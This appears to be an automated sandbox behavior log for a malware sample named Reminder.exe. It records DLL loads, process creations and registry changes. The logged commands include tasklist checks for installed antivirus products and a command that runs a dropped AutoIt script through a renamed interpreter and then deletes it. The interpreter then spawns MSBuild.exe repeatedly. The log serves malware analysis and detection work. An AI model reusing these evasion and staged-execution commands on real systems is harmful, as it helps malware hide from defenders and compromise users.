Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3x Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: version.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: mpr.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: version.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: mpr.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\edgheaa\AutoIt3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Reminder.exe Static file information: File size 5563800 > 1048576
Source: Reminder.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
